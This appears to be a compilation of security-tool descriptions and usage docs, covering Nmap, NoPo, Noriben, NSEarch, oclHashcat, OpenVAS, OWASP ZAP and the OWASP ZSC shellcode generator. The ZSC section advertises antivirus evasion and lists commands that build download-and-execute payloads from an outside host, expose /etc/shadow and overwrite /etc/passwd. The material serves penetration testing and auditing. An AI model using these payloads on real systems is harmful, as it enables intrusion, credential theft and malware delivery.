Nmap 7 - Security Scanner For Network Exploration & Security Audits


Nmap (“Network Mapper”) is a free and open source (license) utility for network discovery and security auditing. Many systems and network administrators also find it useful for network inventory, managing service upgrade schedules, monitoring host or service uptime, and many other tasks. Nmap uses raw IP packets in novel ways to determine what hosts are available on the network, what services (application name and version) those hosts are offering, what operating systems (and OS versions) they are running, what type of packet filters/firewalls are in use, and dozens of other characteristics. It was designed to rapidly scan large networks, but works fine against single hosts. Nmap runs on all major computer operating systems, and official binary packages are available for Linux, Windows, and Mac OS X. In addition to the classic command-line Nmap executable, the Nmap suite includes an advanced GUI and results viewer (Zenmap), a flexible data transfer, redirection, and debugging tool (Ncat), a utility for comparing scan results (Ndiff), and a packet generation and response analysis tool (Nping).

Nmap was named “Security Product of the Year” by Linux Journal, Info World, LinuxQuestions.Org, and Codetalker Digest. It was even featured in nineteen movies and TV series, including The Matrix Reloaded, The Bourne Ultimatum, Girl with the Dragon Tattoo, Dredd, Elysium, and Die Hard 4. Nmap was released to the public in 1997 and has earned the trust of millions of users.

Top 7 Improvements in Nmap 7

Before we get into the detailed changes, here are the top 7 improvements in Nmap 7:
1. Major Nmap Scripting Engine (NSE) Expansion
As the Nmap core has matured, more and more new functionality is developed as part of our NSE subsystem instead. In fact, we've added 171 new scripts and 20 libraries since Nmap 6. Examples include firewall-bypass, supermicro-ipmi-conf, oracle-brute-stealth, and ssl-heartbleed. And NSE is now powerful enough that scripts can take on core functions such as host discovery (dns-ip6-arpa-scan), version scanning (ike-version, snmp-info, etc.), and RPC grinding (rpc-grind). There's even a proposal to implement port scanning in NSE. [More Details]

2. Mature IPv6 support
IPv6 scanning improvements were a big item in the Nmap 6 release, but Nmap 7 outdoes them all with full IPv6 support for CIDR-style address ranges, Idle Scan, parallel reverse-DNS, and more NSE script coverage. [More Details]

3. Infrastructure Upgrades
We may be an 18-year-old project, but that doesn't mean we'll stick with old, crumbling infrastructure! The Nmap Project continues to adopt the latest technologies to enhance the development process and serve a growing user base. For example, we converted all of Nmap.Org to SSL to reduce the risk of trojan binaries and reduce snooping in general. We've also been using the Git version control system as a larger part of our workflow and have an official Github mirror of the Nmap Subversion source repository and we encourage code submissions to be made as Github pull requests. We also created an official bug tracker which is also hosted on Github. Tracking bugs and enhancement requests this way has already reduced the number which fall through the cracks. [More Details]

4. Faster Scans
Nmap has continually pushed the speed boundaries of synchronous network scanning for 18 years, and this release is no exception. New Nsock engines give a performance boost to Windows and BSD systems, target reordering prevents a nasty edge case on multihomed systems, and NSE tweaks lead to much faster -sV scans. [More Details]

5. SSL/TLS scanning solution of choice
Transport Layer Security (TLS) and its predecessor, SSL, are the security underpinning of the web, so when big vulnerabilities like Heartbleed, POODLE, and FREAK come calling, Nmap answers with vulnerability detection NSE scripts. The ssl-enum-ciphers script has been entirely revamped to perform fast analysis of TLS deployment problems, and version scanning probes have been tweaked to quickly detect the newest TLS handshake versions. [More Details]

6. Ncat Enhanced
We are excited and proud to announce that Ncat has been adopted by the Red Hat/Fedora family of distributions as the default package to provide the "netcat" and "nc" commands! This cooperation has resulted in a lot of squashed bugs and enhanced compatibility with Netcat's options. Also very exciting is the addition of an embedded Lua interpreter for creating simple, cross-platform daemons and traffic filters.

7. Extreme Portability
Nmap is proudly cross-platform and runs on all sorts of esoteric and archaic systems. But our binary distributions have to be kept up-to-date with the latest popular operating systems. Nmap 7 runs cleanly on Windows 10 all the way back to Windows Vista. By popular request, we even built it to run on Windows XP, though we suggest those users upgrade their systems. Mac OS X is supported from 10.8 Mountain Lion through 10.11 El Capitan. Plus, we updated support for Solaris and AIX. And Linux users—you have it easy.

Download Nmap 7

NoPo - NoSQL Honeypot Framework


NoSQL-Honeypot-Framework (NoPo) is an open source honeypot for NoSQL databases that automates the process of detecting attackers and logging attack incidents. The simulation engines are deployed using the Twisted framework. Currently the framework supports Redis.

N.B.: The framework is under development and is prone to bugs.

Installation
You can download NoPo by cloning the Git repository:
git clone https://github.com/torque59/nosqlpot.git

pip install -r requirements.txt
NoPo works out of the box with Python version 2.6.x and 2.7.x on any platform.

Added Features:
  • First Ever Honeypot for NoSQL Databases
  • Support For Config Files
  • Simulates Protocol Specification as of Servers
  • Support for Redis

Usage
Get a list of basic options:
python nopo.py -h
Deploy a NoSQL engine:
python nopo.py -deploy redis
Deploy a NoSQL engine with a configuration file:
python nopo.py -deploy redis -config filename
Log commands and the session to a file:
python nopo.py -deploy redis -out log.out


Download NoPo

Noriben - Your Personal, Portable Malware Sandbox


Noriben is a Python-based script that works in conjunction with Sysinternals Procmon to automatically collect, analyze, and report on runtime indicators of malware. In a nutshell, it allows you to run your malware, hit a keypress, and get a simple text report of the sample's activities.

Noriben allows you not only to run malware as a sandbox would, but also to log system-wide events while you manually run the malware in whatever way is needed to make it execute. For example, it can listen as you run malware that requires varying command line options, or watch the system as you step through malware in a debugger.

Noriben only requires Sysinternals procmon.exe (or procmon64.exe) to operate. It requires no pre-filtering (though pre-filtering would greatly help), as it contains numerous whitelist items to reduce unwanted noise from system activity.

Cool Features

If you have a folder of YARA signature files, you can specify it with the --yara option. Every newly created file will be scanned against these signatures, with the results displayed in the output.

If you have a VirusTotal API key, place it into a file named "virustotal.api" (or embed it directly in the script) to auto-submit MD5 file hashes to VT and get the number of antivirus detections.

You can add lists of MD5s to auto-ignore (such as all of your system files). Generate them with md5deep, put them in a text file, and use --hash to read it.

You can automate the script for sandbox usage. Using -t to set the execution time and --cmd "path\exe" to specify a malware file, you can automatically run malware, copy the results off, and then revert the system to run a new sample.

The --generalize feature will automatically substitute absolute paths with Windows environment paths for better IOC development. For example, C:\Users\malware_user\AppData\Roaming\malware.exe will be automatically resolved to %AppData%\malware.exe.

Usage:
--===[ Noriben v1.6 ]===--
--===[   @bbaskin   ]===--

usage: Noriben.py [-h] [-c CSV] [-p PML] [-f FILTER] [--hash HASH]
                  [-t TIMEOUT] [--output OUTPUT] [--yara YARA] [--generalize]
                  [--cmd CMD] [-d]

optional arguments:
  -h, --help            show this help message and exit
  -c CSV, --csv CSV     Re-analyze an existing Noriben CSV file
  -p PML, --pml PML     Re-analyze an existing Noriben PML file
  -f FILTER, --filter FILTER
                        Specify alternate Procmon Filter PMC
  --hash HASH           Specify MD5 file whitelist
  -t TIMEOUT, --timeout TIMEOUT
                        Number of seconds to collect activity
  --output OUTPUT       Folder to store output files
  --yara YARA           Folder containing YARA rules
  --generalize          Generalize file paths to their environment variables.
                        Default: True
  --cmd CMD             Command line to execute (in quotes)
  -d                    Enable debug tracebacks


Download Noriben

NSEarch - Nmap Script Engine Search


NSEarch is a tool that helps you find Nmap Scripting Engine (NSE) scripts. Scripts can be searched by name or by category, and it is also possible to view the documentation of the scripts found.

USAGE:
  $ python nsearch.py

Main Menu

Initial Setup
 ================================================
    _   _  _____  _____                     _
   | \ | |/  ___||  ___|                   | |
   |  \| |\ `--. | |__    __ _  _ __   ___ | |__
   | . ` | `--. \|  __|  / _` || '__| / __|| '_ \
   | |\  |/\__/ /| |___ | (_| || |   | (__ | | | |
   \_| \_/\____/ \____/  \__,_||_|    \___||_| |_|
 ================================================
   Version 0.3     |   @jjtibaquira
 ================================================

  Creating Database :nmap_scripts.sqlite3
  Creating Table For Script ....
  Creating Table for Categories ....
  Creating Table for Scripts per Category ....
  Upload Categories to Categories Table ...

Main Console

  nsearch>

Basic Commands
  ================================================
    _   _  _____  _____                     _
   | \ | |/  ___||  ___|                   | |
   |  \| |\ `--. | |__    __ _  _ __   ___ | |__
   | . ` | `--. \|  __|  / _` || '__| / __|| '_ \
   | |\  |/\__/ /| |___ | (_| || |   | (__ | | | |
   \_| \_/\____/ \____/  \__,_||_|    \___||_| |_|
  ================================================
   Version 0.3     |   @jjtibaquira
  ================================================

  nsearch> help

  Nsearch Commands
  ================
  clear  doc  exit  help  history  last  search

  nsearch>
  ================================================
    _   _  _____  _____                     _
   | \ | |/  ___||  ___|                   | |
   |  \| |\ `--. | |__    __ _  _ __   ___ | |__
   | . ` | `--. \|  __|  / _` || '__| / __|| '_ \
   | |\  |/\__/ /| |___ | (_| || |   | (__ | | | |
   \_| \_/\____/ \____/  \__,_||_|    \___||_| |_|
  ================================================
   Version 0.3     |   @jjtibaquira
  ================================================

  nsearch> help search

  name     : Search by script's name
  category : Search by category
  Usage:
    search name:http
    search category:exploit

  nsearch>
  ================================================
    _   _  _____  _____                     _
   | \ | |/  ___||  ___|                   | |
   |  \| |\ `--. | |__    __ _  _ __   ___ | |__
   | . ` | `--. \|  __|  / _` || '__| / __|| '_ \
   | |\  |/\__/ /| |___ | (_| || |   | (__ | | | |
   \_| \_/\____/ \____/  \__,_||_|    \___||_| |_|
  ================================================
   Version 0.3     |   @jjtibaquira
  ================================================

  nsearch> search name:ssh
  1.ssh-hostkey.nse
  2.ssh2-enum-algos.nse
  3.sshv1.nse
  nsearch>
  ================================================
    _   _  _____  _____                     _
   | \ | |/  ___||  ___|                   | |
   |  \| |\ `--. | |__    __ _  _ __   ___ | |__
   | . ` | `--. \|  __|  / _` || '__| / __|| '_ \
   | |\  |/\__/ /| |___ | (_| || |   | (__ | | | |
   \_| \_/\____/ \____/  \__,_||_|    \___||_| |_|
  ================================================
   Version 0.3     |   @jjtibaquira
  ================================================

  nsearch> doc ssh <TAB>
  ssh-hostkey.nse      ssh2-enum-algos.nse  sshv1.nse
  nsearch> doc sshv1.nse
  local nmap = require "nmap"
  local shortport = require "shortport"
  local string = require "string"

  description = [[
    Checks if an SSH server supports the obsolete and less secure SSH Protocol Version 1.
  ]]
  author = "Brandon Enright"
  nsearch>


Download NSEarch

oclHashcat v2.01 - World's Fastest Password Cracker


oclHashcat is the world's fastest and most advanced GPGPU-based password recovery utility, supporting five unique modes of attack for over 170 highly-optimized hashing algorithms. oclHashcat currently supports AMD (OpenCL) and Nvidia (CUDA) graphics processors on GNU/Linux and Windows 7/8/10, and has facilities to help enable distributed password cracking.

Features

  • World's fastest password cracker
  • World's first and only GPGPU-based rule engine
  • Free
  • Open-Source
  • Multi-GPU (up to 128 gpus)
  • Multi-Hash (up to 100 million hashes)
  • Multi-OS (Linux & Windows native binaries)
  • Multi-Platform (OpenCL & CUDA support)
  • Multi-Algo (see below)
  • Low resource utilization, you can still watch movies or play games while cracking
  • Focuses on highly iterated modern hashes
  • Focuses on dictionary-based attacks
  • Supports distributed cracking
  • Supports pause / resume while cracking
  • Supports sessions
  • Supports restore
  • Supports reading words from file
  • Supports reading words from stdin
  • Supports hex-salt
  • Supports hex-charset
  • Built-in benchmarking system
  • Integrated thermal watchdog
  • ... and much more

Attack-Modes

  • Straight *
  • Combination
  • Brute-force
  • Hybrid dict + mask
  • Hybrid mask + dict
* accept Rules

Algorithms

  • MD4
  • MD5
  • Half MD5 (left, mid, right)
  • SHA1
  • SHA-256
  • SHA-384
  • SHA-512
  • SHA-3 (Keccak)
  • SipHash
  • RipeMD160
  • Whirlpool
  • GOST R 34.11-94
  • GOST R 34.11-2012 (Streebog) 256-bit
  • GOST R 34.11-2012 (Streebog) 512-bit
  • Double MD5
  • Double SHA1
  • md5($pass.$salt)
  • md5($salt.$pass)
  • md5(unicode($pass).$salt)
  • md5($salt.unicode($pass))
  • md5(sha1($pass))
  • md5($salt.md5($pass))
  • md5($salt.$pass.$salt)
  • md5(strtoupper(md5($pass)))
  • sha1($pass.$salt)
  • sha1($salt.$pass)
  • sha1(unicode($pass).$salt)
  • sha1($salt.unicode($pass))
  • sha1(md5($pass))
  • sha1($salt.$pass.$salt)
  • sha256($pass.$salt)
  • sha256($salt.$pass)
  • sha256(unicode($pass).$salt)
  • sha256($salt.unicode($pass))
  • sha512($pass.$salt)
  • sha512($salt.$pass)
  • sha512(unicode($pass).$salt)
  • sha512($salt.unicode($pass))
  • HMAC-MD5 (key = $pass)
  • HMAC-MD5 (key = $salt)
  • HMAC-SHA1 (key = $pass)
  • HMAC-SHA1 (key = $salt)
  • HMAC-SHA256 (key = $pass)
  • HMAC-SHA256 (key = $salt)
  • HMAC-SHA512 (key = $pass)
  • HMAC-SHA512 (key = $salt)
  • PBKDF2-HMAC-MD5
  • PBKDF2-HMAC-SHA1
  • PBKDF2-HMAC-SHA256
  • PBKDF2-HMAC-SHA512
  • MyBB
  • phpBB3
  • SMF
  • vBulletin
  • IPB
  • Woltlab Burning Board
  • osCommerce
  • xt:Commerce
  • PrestaShop
  • Mediawiki B type
  • Wordpress
  • Drupal
  • Joomla
  • PHPS
  • Django (SHA-1)
  • Django (PBKDF2-SHA256)
  • EPiServer
  • ColdFusion 10+
  • Apache MD5-APR
  • MySQL
  • PostgreSQL
  • MSSQL
  • Oracle H: Type (Oracle 7+)
  • Oracle S: Type (Oracle 11+)
  • Oracle T: Type (Oracle 12+)
  • Sybase
  • hMailServer
  • DNSSEC (NSEC3)
  • IKE-PSK
  • IPMI2 RAKP
  • iSCSI CHAP
  • Cram MD5
  • MySQL Challenge-Response Authentication (SHA1)
  • PostgreSQL Challenge-Response Authentication (MD5)
  • SIP Digest Authentication (MD5)
  • WPA
  • WPA2
  • NetNTLMv1
  • NetNTLMv1 + ESS
  • NetNTLMv2
  • Kerberos 5 AS-REQ Pre-Auth etype 23
  • Netscape LDAP SHA/SSHA
  • LM
  • NTLM
  • Domain Cached Credentials (DCC), MS Cache
  • Domain Cached Credentials 2 (DCC2), MS Cache 2
  • MS-AzureSync PBKDF2-HMAC-SHA256
  • descrypt
  • bsdicrypt
  • md5crypt
  • sha256crypt
  • sha512crypt
  • bcrypt
  • scrypt
  • OSX v10.4
  • OSX v10.5
  • OSX v10.6
  • OSX v10.7
  • OSX v10.8
  • OSX v10.9
  • OSX v10.10
  • AIX {smd5}
  • AIX {ssha1}
  • AIX {ssha256}
  • AIX {ssha512}
  • Cisco-ASA
  • Cisco-PIX
  • Cisco-IOS
  • Cisco $8$
  • Cisco $9$
  • Juniper IVE
  • Juniper Netscreen/SSG (ScreenOS)
  • Android PIN
  • GRUB 2
  • CRC32
  • RACF
  • Radmin2
  • Redmine
  • Citrix Netscaler
  • SAP CODVN B (BCODE)
  • SAP CODVN F/G (PASSCODE)
  • SAP CODVN H (PWDSALTEDHASH) iSSHA-1
  • PeopleSoft
  • Skype
  • 7-Zip
  • RAR3-hp
  • PDF 1.1 - 1.3 (Acrobat 2 - 4)
  • PDF 1.4 - 1.6 (Acrobat 5 - 8)
  • PDF 1.7 Level 3 (Acrobat 9)
  • PDF 1.7 Level 8 (Acrobat 10 - 11)
  • MS Office <= 2003 MD5
  • MS Office <= 2003 SHA1
  • MS Office 2007
  • MS Office 2010
  • MS Office 2013
  • Lotus Notes/Domino 5
  • Lotus Notes/Domino 6
  • Lotus Notes/Domino 8
  • Bitcoin/Litecoin wallet.dat
  • Blockchain, My Wallet
  • 1Password, agilekeychain
  • 1Password, cloudkeychain
  • Lastpass
  • Password Safe v2
  • Password Safe v3
  • eCryptfs
  • Android FDE <= 4.3
  • TrueCrypt 5.0+

Download oclHashcat v2.01

OpenVAS - The World's Most Advanced Open Source Vulnerability Scanner and Manager


The Open Vulnerability Assessment System (OpenVAS) is a framework of several services and tools. The core of this SSL-secured service-oriented architecture is the OpenVAS Scanner. The scanner very efficiently executes the actual Network Vulnerability Tests (NVTs) which are served with daily updates via the OpenVAS NVT Feed or via a commercial feed service.


The OpenVAS Manager is the central service that consolidates plain vulnerability scanning into a full vulnerability management solution. The Manager controls the Scanner via OTP (OpenVAS Transfer Protocol) and itself offers the XML-based, stateless OpenVAS Management Protocol (OMP). All intelligence is implemented in the Manager, so it is possible to implement various lean clients that behave consistently, e.g. with regard to filtering or sorting scan results. The Manager also controls an SQL database (sqlite-based) where all configuration and scan result data is centrally stored. Finally, the Manager also handles user management, including access control with groups and roles.


The OpenVAS protocols

Different OMP clients are available: the Greenbone Security Assistant (GSA) is a lean web service offering a user interface for web browsers. GSA uses an XSL transformation stylesheet that converts OMP responses into HTML.


OpenVAS CLI contains the command line tool "omp", which allows you to create batch processes that drive the OpenVAS Manager. Another tool in this package is a Nagios plugin.


Most of the tools listed above share functionality that is aggregated in the OpenVAS Libraries.

The OpenVAS Scanner offers the communication protocol OTP (OpenVAS Transfer Protocol), which controls scan execution. This protocol is expected to be replaced eventually, so developing OTP clients is not recommended.

Feature overview


  • OpenVAS Scanner
    • Many target hosts are scanned concurrently
    • OpenVAS Transfer Protocol (OTP)
    • SSL support for OTP (always)
    • WMI support (optional)
    • ...
  • OpenVAS Manager
    • OpenVAS Management Protocol (OMP)
    • SQL Database (sqlite) for configurations and scan results
    • SSL support for OMP (always)
    • Many concurrent scan tasks (many OpenVAS Scanners)
    • Notes management for scan results
    • False Positive management for scan results
    • Scheduled scans
    • Flexible escalators upon status of a scan task
    • Stop, Pause and Resume of scan tasks
    • Master-Slave Mode to control many instances from a central one
    • Report Format Plugin Framework with various plugins for XML, HTML, LaTeX, etc.
    • User Management
    • Feed status view
    • Feed synchronisation
    • ...
  • Greenbone Security Assistant (GSA)
    • Client for OMP and OAP
    • HTTP and HTTPS
    • Web server on its own (microhttpd), thus no extra web server required
    • Integrated online-help system
    • Multi-language support
    • ...
  • OpenVAS CLI
    • Client for OMP
    • Runs on Windows, Linux, etc.
    • Plugin for Nagios
    • ...


Download OpenVAS

OWASP ZAP 2.4.0 - Penetration Testing Tool for Testing Web Applications


ZAP is an OWASP Flagship project, and is currently the most active open source web application security tool.


Some of the most significant changes include:

‘Attack’ Mode

A new ‘attack’ mode has been added: applications that you have specified as in scope are actively scanned as they are discovered.

Advanced Fuzzing

A completely new fuzzing dialog has been introduced that allows multiple injection points to be attacked at the same time, as well as introducing new attack payloads including the option to use scripts for generating the payloads as well as pre and post attack manipulation and analysis.

Scan Policies

Scan policies define exactly which rules are run as part of an active scan.
They also define how these rules run influencing how many requests are made and how likely potential issues are to be flagged.
The new Scan Policy Manager dialog allows you to create, import and export as many scan policies as you need. You select any scan policy when you start an active scan and also specify the one used by the new attack mode.
Scan policy dialog boxes allow sorting by any column, and include a quality column (indicating if individual scanners are Release, Beta, or Alpha quality).

Scan Dialogs with Advanced Options

New Active Scan and Spider dialogs have replaced the increasing number of right click 'Attack' options. These provide easy access to all of the most common options and optionally a wide range of advanced options.

Hiding Unused Tabs

By default only the essential tabs are now shown when ZAP starts up.
The remaining tabs are revealed when they are used (e.g. for the spider and active scanner) or when you display them via the special tab on the far right of each window with the green '+' icon. This special tab disappears if there are no hidden tabs.
Tabs can be closed via a small 'x' icon which is shown when the tab is selected.
Tabs can also be 'pinned' using a small 'pin' icon that is also shown when the tab is selected - pinned tabs will be shown when ZAP next starts up.

New Add-ons

Two significant new ‘alpha’ quality add-ons are available:
  • Access Control Testing: adds the ability to automate many aspects of access control testing.
  • Sequence Scanning: adds the ability to scan 'sequences' of web pages, in other words pages that must be visited in a strict order to work correctly.
These can both be downloaded from the ZAP Marketplace.

New Scan Rules

A number of significant new ‘alpha’ quality scanners are available:
  • Relative Path Confusion: Allows ZAP to scan for issues that may result in XSS, by detecting if the browser can be fooled into interpreting HTML as CSS.
  • Proxy Disclosure: Allows ZAP to detect forward and reverse proxies between the ZAP instance and the origin web server / application server.
  • Storability / Cacheability: Allows ZAP to passively determine whether a page is storable by a shared cache, and whether it can be served from that cache in response to a similar request. This is useful from both a privacy and application performance perspective. The scanner follows RFC 7234.
Support has also been added for Direct Web Remoting as an input vector for all scan rules.

Changed Scan Rules

  • External Redirect: This plugin’s ID has been changed from 30000 to 20019, in order to more closely align with the established groupings. (This change may be of importance to **API Users**). Additionally some minor changes have been implemented to prevent collisions between injected values and in-page content, and improve performance. (Issues: 1529 and 1569)
  • Session ID in URL Rewrite: This plugin has been updated with a minimum length check for the value of the parameters it looks for. A false positive condition was raised related to this plugin (Issue 1396) whereby sID=5 would trigger a finding. Minimum length for session IDs as this plugin interprets them is now eight (8) characters.
  • Client Browser Cache: The active scan rule TestClientBrowserCache has been removed. Checks performed by the passive scan rule CacheControlScanner have been slightly modified. (Issue 1499)

More User Interface Changes

  • The ZAP splash screen is back: It now includes new graphics, a tips & tricks module, and loading/progress info.
  • The active scan dialog shows the real plugin progress status, based on the number of nodes that need to be scanned.
  • There is a new session persistence options dialog that prompts the user for their preferred settings at startup (you can choose to “Remember” the option and not be asked again).
  • For all Alerts the Risk field (False Positive, Suspicious, Warning) has been replaced with a more appropriately defined Confidence field (False Positive, Low, Medium, High, or Confirmed).
  • Timestamps are now optionally available for the output tab.

Extended API Support

The API now supports spidering and active scanning of multiple targets concurrently, the management of scan policies, and even more of the ZAP functionality.

Internationalized Help Add-ons

The help files are internationalized via https://crowdin.net/project/owasp-zap-help.
If you use ZAP in one of the many languages we support, then look on the ZAP Marketplace to see if the help files for that language are available. These will include all of the available translations for that language while defaulting back to English for phrases that have not yet been translated.

Release Notes

See the Release Notes (https://code.google.com/p/zaproxy/wiki/HelpReleases2_4_0) for a full list of all of the changes included in this release.


Download ZAP 2.4.0

OWASP ZAP 2.4.1 - Penetration Testing Tool for Testing Web Applications


The OWASP Zed Attack Proxy (ZAP) is an easy to use integrated penetration testing tool for finding vulnerabilities in web applications.

It is designed to be used by people with a wide range of security experience and as such is ideal for developers and functional testers who are new to penetration testing, as well as being a useful addition to an experienced pen tester's toolbox.

Release 2.4.1

This release includes important security fixes - users are urged to upgrade asap.

One of the changes means that an API key is created by default, so any applications using the ZAP API will fail unless they are updated to use that key. The API key can be found in the API Options screen. You can also set it from the command line using an option like:
-config api.key=change-me-9203935709
For more details see https://github.com/zaproxy/zaproxy/wiki/FAQapikey
The following changes were made in this release:

Enhancements:
  • Issue 321 : Support multiple databases
  • Issue 1459 : Add an HTTP sender listener script
  • Issue 1500 : Update Bouncy Castle libs
  • Issue 1566 : Improve active scan's reported progress
  • Issue 1573 : Add option to inject plugin ID in header for all ascan requests
  • Issue 1607 : Unable to save the test session via API
  • Issue 1621 : AScan API - Allow to scan as an user
  • Issue 1625 : Support multiple structural params and ones on top level nodes
  • Issue 1653 : Support context menu key for trees
  • Issue 1655 : Copy Session Token from Http Sessions tab to clipboard
  • Issue 1662 : Add default Rails anti-CSRF token parameter
  • Issue 1664 : Clients tab autoscroll
  • Issue 1684 : Unable to set technology via API
  • Issue 1688 : Updating owasp/zap2docker image with Python Client API
  • Issue 1690 : Bump key pair size to 2048 for all certs in the (proxy's) chain of trust
  • Issue 1695 : Change SSL cert signature algorithm to "SHA-256 with RSA Encryption"
  • Issue 1699 : Allow ApiImplementor's to add custom headers
  • Issue 1715 : Unable to pass arguments when launching ZAP from the command line on Mac OS X
  • Issue 1728 : Update JRE to 1.7u79 (CPU) for MacOS

Bug fixes:
  • Issue 444 : Guaranteed NPE on AliasCertificate.getName() if getCN()==null
  • Issue 1442 : Up/Down arrow keys in results stop working if "reflected"
  • Issue 1473 : Spider does not handle URLs extracted from meta tags correctly
  • Issue 1497 : The spider is extracting and reporting links from comments - event when instructed not to do so
  • Issue 1598 : startup script lacks support for FreeBSD
  • Issue 1615 : Search "All" option not working
  • Issue 1617 : ZAP 2.4.0 throws HeadlessExceptions when running in daemon mode on headless machine
  • Issue 1618 : Target Technology Not Honored
  • Issue 1619 : Search regex might not be validated
  • Issue 1624 : Error while loading ZAP 2.4.0
  • Issue 1626 : Structural parameters not saved when context exported and not available via the API
  • Issue 1636 : Users (for auth) & Forced User not loaded from session
  • Issue 1647 : Wrong reference in Zest Result
  • Issue 1674 : Ajax spider not considering get parameters
  • Issue 1677 : Fuzzers can't be expanded on OS X
  • Issue 1694 : "Error: setting file is missing. Program will exit." even if file exists
  • Issue 1698 : Escape API exceptions
  • Issue 1700 : Forced Browse Lists Missing from Drop-Down in 2.4.0
  • Issue 1706 : Add API security options
  • Issue 1708 : Context's technology tree can get out of sync
  • Issue 1709 : Applications are not (immediately) shown after start
  • Issue 1714 : PNH should not reflect API key unless user supplies it
  • Issue 1716 : Restrict use of CORS header in pnh
  • Issue 1720 : Add more security options for JSONP API
  • Issue 1724 : Ensure API component names are escaped in the HTML output
  • Issue 1735 : Context's technologies not used in active scan unless overridden

OWASP ZSC Shellcoder - Generate Customized Shellcodes



OWASP ZSC is open source software written in Python which lets you generate customized shellcodes for the listed operating systems. This software can be run on Windows, Linux/Unix, OS X and other operating systems under Python 2.7.x.

Description

Usage of shellcodes

Shellcodes are small pieces of assembly code which can be used as the payload in software exploitation. Other uses are in malware, bypassing antiviruses, obfuscated code, etc.

Why use OWASP ZSC ?

Compared with other shellcode generators such as the Metasploit tools, OWASP ZSC uses new encodings and methods that antiviruses won't detect. The OWASP ZSC encoders can generate shellcodes with random encodings, which lets you get thousands of new dynamic shellcodes for the same job in just a second; that is, you will not get the same code twice if you use random encodes with the same commands, and that makes OWASP ZSC one of the best. It will also generate shellcodes for many more operating systems in future versions.

Help Menu
Switches:
-h, --h, -help, --help => to see this help guide
-os => choose your os to create shellcode
-oslist   => list os for switch -os
-o => output filename
-job => what shellcode gonna do for you ?
-joblist => list of -job switch
-encode => generate shellcode with encode
-types => types of encode for -encode switch
-wizard => wizard mod

-update => check for update
-about => about software and developers.
With these switches you can see the OS list, the encode types and the functions [joblist] needed to generate your shellcode.
OS List "-oslist"
[+] linux_x86
[+] linux_x64
[+] linux_arm
[+] linux_mips
[+] freebsd_x86
[+] freebsd_x64
[+] windows_x86
[+] windows_x64
[+] osx
[+] solaris_x86
[+] solaris_x64
Encode Types "-types"
[+] none
[+] xor_random
[+] xor_yourvalue
[+] add_random
[+] add_yourvalue
[+] sub_random
[+] sub_yourvalue
[+] inc
[+] inc_timesyouwant
[+] dec
[+] dec_timesyouwant
[+] mix_all
Functions "-joblist"
[+] exec('/path/file')
[+] chmod('/path/file','permission number')
[+] write('/path/file','text to write')
[+] file_create('/path/file','text to write')
[+] dir_create('/path/folder')
[+] download('url','filename')
[+] download_execute('url','filename','command to execute')
[+] system('command to execute')
[+] script_executor('name of script','path and name of your script in your pc','execute command')

Now you are able to choose your operating system, function and encode to generate your shellcode. However, not all of these features are activated yet, so you have to look up the features table to see which ones are.


For example, this part of the table tells us that all functions for linux_x86 are activated, but the encodes [xor_random, xor_yourvalue, add_random, add_yourvalue, sub_random, sub_yourvalue, inc, inc_timesyouwant, dec, dec_timesyouwant] are only activated for the chmod() function.

Examples
>zsc -os linux_x86 -encode inc -job "chmod('/etc/passwd','777')" -o file
>zsc -os linux_x86 -encode dec -job "chmod('/etc/passwd','777')" -o file
>zsc -os linux_x86 -encode inc_10 -job "chmod('/etc/passwd','777')" -o file
>zsc -os linux_x86 -encode dec_30 -job "chmod('/etc/passwd','777')" -o file
>zsc -os linux_x86 -encode xor_random -job "chmod('/etc/shadow','777')" -o file.txt
>zsc -os linux_x86 -encode xor_random -job "chmod('/etc/passwd','444')" -o file.txt
>zsc -os linux_x86 -encode xor_0x41414141 -job "chmod('/etc/shadow','777')" -o file.txt
>zsc -os linux_x86 -encode xor_0x45872f4d -job "chmod('/etc/passwd','444')" -o file.txt
>zsc -os linux_x86 -encode add_random -job "chmod('/etc/passwd','444')" -o file.txt
>zsc -os linux_x86 -encode add_0x41414141 -job "chmod('/etc/passwd','777')" -o file.txt
>zsc -os linux_x86 -encode sub_random -job "chmod('/etc/passwd','777')" -o file.txt
>zsc -os linux_x86 -encode sub_0x41414141 -job "chmod('/etc/passwd','444')" -o file.txt
>zsc -os linux_x86 -encode none -job "file_create('/root/Desktop/hello.txt','hello')" -o file.txt
>zsc -os linux_x86 -encode none -job "file_create('/root/Desktop/hello2.txt','hello[space]world[space]!')" -o file.txt
>zsc -os linux_x86 -encode none -job "dir_create('/root/Desktop/mydirectory')" -o file.txt
>zsc -os linux_x86 -encode none -job "download('http://www.z3r0d4y.com/exploit.type','myfile.type')" -o file.txt
>zsc -os linux_x86 -encode none -job "download_execute('http://www.z3r0d4y.com/exploit.type','myfile.type','./myfile.type')" -o file.txt
#multi command
>zsc -os linux_x86 -encode none -job "download_execute('http://www.z3r0d4y.com/exploit.type','myfile.type','chmod[space]777[space]myfile.type;sh[space]myfile.type')" -o file.txt
>zsc -os linux_x86 -encode none -job "script_executor('script.type','D:\\myfile.type','./script.type')" -o file.txt
>zsc -os linux_x86 -encode none -job "script_executor('z3r0d4y.sh','/root/z3r0d4y.sh','sh[space]z3r0d4y.sh')" -o file.txt
>zsc -os linux_x86 -encode none -job "script_executor('ali.py','/root/Desktop/0day.py','chmod[space]+x[space]ali.py;[space]python[space]ali.py')" -o file.txt
>zsc -os linux_x86 -encode none -job "system('ls')" -o file.txt
>zsc -os linux_x86 -encode none -job "system('ls[space]-la')" -o file.txt
>zsc -os linux_x86 -encode none -job "system('ls[space]-la[space]/etc/shadow;chmod[space]777[space]/etc/shadow;ls[space]-la[space]/etc/shadow;cat[space]/etc/shadow;wget[space]file[space];chmod[space]777[space]file;./file')" -o file.txt
>zsc -os linux_x86 -encode none -job "system('wget[space]file;sh[space]file')" -o file.txt
>zsc -os linux_x86 -encode none -job "chmod('/etc/shadow','777')" -o file.txt
>zsc -os linux_x86 -encode none -job "write('/etc/passwd','user:pass')" -o file.txt
>zsc -os linux_x86 -encode none -job "exec('/bin/bash')" -o file.txt
Note: Don’t use a space ‘ ’ in the system() function; replace it with “[space]” and the software will detect it and substitute “ ” for you in the shellcode.
Note: script_executor(), download_execute(), download(), dir_create() and file_create() use the Linux command line [wget, mkdir, echo], not the function itself. The system() function has been added to the script; you can use it to do anything and generate shellcode for any command line.
Note: exec() doesn’t support any ARGV, such as exec(‘/bin/bash -c ls’) or exec(‘/bin/bash’,‘-c’,‘ls’); you have to wait for the next version, when this feature will be available in system().
Note: you can also use a high value for the inc and dec count, like inc_100000, but your shellcode may get too big.
Note: each time you execute the chmod() [or any other] function with a random encode, you get random output and a different shellcode.
Note: your xor value can be anything; “xor_0x41414141” and “xor_0x45872f4d” are just examples.

Wizard Switch

